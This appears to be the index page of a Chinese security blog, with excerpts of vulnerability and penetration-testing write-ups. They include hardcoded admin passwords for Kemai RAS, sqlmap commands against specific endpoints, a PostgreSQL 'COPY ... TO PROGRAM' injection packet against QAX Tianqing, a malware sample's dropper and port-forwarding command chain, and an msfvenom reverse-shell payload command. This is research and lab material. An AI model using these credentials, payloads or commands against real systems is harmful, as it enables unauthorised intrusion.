科迈RAS 多个安全漏洞
应急时碰到的一套系统,简单记录下 0x01 硬编码问题科迈RAS4.0在安装时会创建2个管理员账户RAS_admin、RASCOM,这两个账户硬编码了2组密码, 账户名 密码 RASCOM 1A2b3C4d56. RAS_admin R1a2b3c4d56. 这就导致如果机器开了RDP,那么可以通过这两组帐密直接登录 0x02 SQL注入问题审计的时候发现这套源码通过COM组件形式调用的SQL语句,IDA里看到均为直接拼接,没有做过滤 Server/CmxCheckBind.php python3 sqlmap.py -u "http://10.100.100.133:8088/Server/CmxCheckBind.php?a=1&b=2&c=3&d=4&from=5" --level 5 --risk 3 Server/CmxBindMachine.php python3 sqlmap.py -u...
金山终端安全系统V9安全问题
SQL注入文件inter/update_software_info.php <?php//客户端显示数据require_once "./use_db.php";require_once "./common/functions.php";$return=array();$return["nResult"] =0;$where='where 1=1';if (!is_null($_POST['type']) and $_POST['type'] !="") { $id=$_POST['type']; $where .=" and type=$id ";}if (!is_null($_POST['key'])) { $keyname=$_POST['key']; $where .=" and...
金山V8+多个漏洞
SQL注入inter/handler_get_set_data/set_sc_count_online_setup_data_cmd.php 函数set_sc_count_online_setup_data_cmd function set_sc_count_online_setup_data_cmd($para) { global $logHandler, $mysqlDB;// $logHandler->LogError('set_sc_count_online_setup_data_cmd'); $keyData = array("client","server","scid"); $check = checkParam($keyData,$para,$logHandler); if ($check !== true) return false; $SCID= $para['scid']; ...
天擎部分漏洞
在某大型活动中捕获到了天擎(QAX Skylar)的几个0day,跟代码审了下 0x01 第一类活动期间在WAF上拦截到一枚注入,数据包如下 POST /api/upload_client_conf.json?mid=马赛克 HTTP/1.1Host: 马赛克User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveContent-Length: 128Content-Type: application/json{"summary": {"0": {"nickname": "cpu='1';CopY(sElEct 1)TO pRogRAM...
CVE-2021-21972 复现和分析
0x01 背景vSphere是VMware推出的虚拟化平台套件,包含ESXi、vCenter Server等一系列的软件。其中vCenter Server为 ESXi的控制中心,可从单一控制点统一管理数据中心的所有vSphere主机和虚拟机,使得IT管理员能够提高控制能力,简化入场任务,并降低IT环境的管理复杂性与成本。 vSphere Client(HTML5)在vCenter Server插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放443端口的服务器向vCenter Server发送精心构造的请求,从而在服务器上写入webshell,最终造成远程任意代码执行。 0x02 代码分析vCenter Server的vROPS插件的API未经过鉴权,存在一些敏感接口。其中 uploadova 接口存在一个上传 OVA 文件的功能: @RequestMapping( value = {"/uploadova"}, method = {RequestMethod.POST})public void...
柠檬鸭组织样本分析
起因 分析1.txt文本内容如下 cmd /c echo RmMrcM >> c:\windows\temp\msInstall.exe&echo copy /y c:\windows\temp\msInstall.exe c:\windows\kNnk.exe>c:/windows/temp/p.bat&echo "*" >c:\windows\temp\eb.txt&echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2 >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53...
多级代理实验
内网渗透中经常碰到多个网段的机器不出网的情况,做一套试验环境来练习下多级代理 环境介绍以下环境均在VM16中搭建 LEDE x2.36 软路由 *1 网络:可出网,边界,IP 172.16.17.100 虚拟机配置:2C 4G 4网卡 Windows server 2019 *1 网络:可出网,DMZ,WEB机,IP 172.16.18.2 虚拟机配置:2C 2G 1网卡 Windows server 2016 *1 网络:不可出网,DMZ,IP 10.100.100.2 虚拟机配置:2C 2G 1网卡 Windows server 2008 R2*1 网络:不可出网,DMZ,IP 192.168.37.1 虚拟机配置:2C 2G 1网卡 Win10 *1 网络:通Win2019 虚机配置:4C8G 1网卡 拓扑图 攻击机配置 Win10 kali...
NPS弱口令之殇
NPS作为一款轻量级、高性能、功能强大的内网穿透代理服务器。并且支持多种协议的转发从而被广泛使用,借助网络空间搜索引擎2020年11月26日的结果,全球范围内共5,582个主机为NPS代理服务器。 目录解析以NPS 0.26.9版本为例,目录结构及含义如下 │ nps│ ├───conf //配置目录│ clients.json //客户端数据文件 │ hosts.json //主机数据文件│ nps.conf //配置文件│ server.key //私钥│ server.pem //证书│ tasks.json //任务数据文件│ └───web //网站目录 ├───static //静态资源目录 │ ├───css │ │ bootstrap-table.min.css │ │ bootstrap.min.css │ │ datatables.css │ │ ...
cobaltstrike插件CrossC2踩坑记录
前言CrossC2面向企业自身及红队人员的安全评估框架,支持CobaltStrike对其他平台(Linux/MacOS/…)的安全评估,支持自定义模块,及包含一些常用的渗透模块。 使用直接下载https://github.com/gloxec/CrossC2/releases 中的最新版即可,导入CNA后即可使用 4.0需要下载4.0分支 4.1需要下载4.1分支 踩坑由于本机是win10,会出现以下2个问题: 1、丢失ucrtbased.dll问题在直接运行genCrossC2.Win.exe时会报错,丢失丢失ucrtbased.dll。 解决方案:安装VS2017或VS2019即可解决,文章后面会提供32位的dll下载,下载后移入C:\Windows\System32即可使用 2、windows下无法通过CNA中生成Linux beacon这个坑浪费了一下午去解决,直接丢解决过程 定位问题cna插件中的第3、4行需要替换为相应的路径 第115行的 $dialog = dialog("CrossC2 Payload...
内存取证工具Volatility使用
记录下Volatility使用过程 环境 Parrot *1 Windows 2008*1 先生成个msf马子 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.17.6 LPORT=4444 -a x64 -f exe -o /home/parrot/Desktop/1.exe 拷到Windows2008机器上运行后迁移进程 然后使用dumpit对内存做完整镜像 做好后的镜像大小取决于机器内存的大小,机器内存越大,镜像后的文件越大 拷回parrot,开始分析 分析命令如下 volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw --profile=Win7SP1x64 malfind查找疑似被注入的进程,这里应该先执行volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw...
PHP ioncube V10.X解密
背景项目中碰到个用ionCube V10加密的源码,需要解密做审计,记录下踩的坑 文件数量2000多,找了一番网站发现https://easytoyou.eu/可以提供解密服务, BTW,这个站一次只能上传一个文件,手动点2000多次不说累死也得烦死 过程按照惯例,先注册个号看看有什么功能 好嘛 10欧元30天会员,冲了再看看解密面板 面板变了,上传个加密的文件抓个包看看 解密完成后在页面中回显下载链接,那么就可以写脚本批量跑了。 思路脚本需要实现的功能是遍历所有指定格式的文件,保存获取到的列表,上传解密,下载解密后的文件 直接贴代码 遍历符合格式的文件代码# Load Foldersdef get_all_path(self): if os.path.exists(self.FileList): pass else: postfix = set(['php']) # 设置要记录的文件格式 for maindir, subdir, file_name_list in...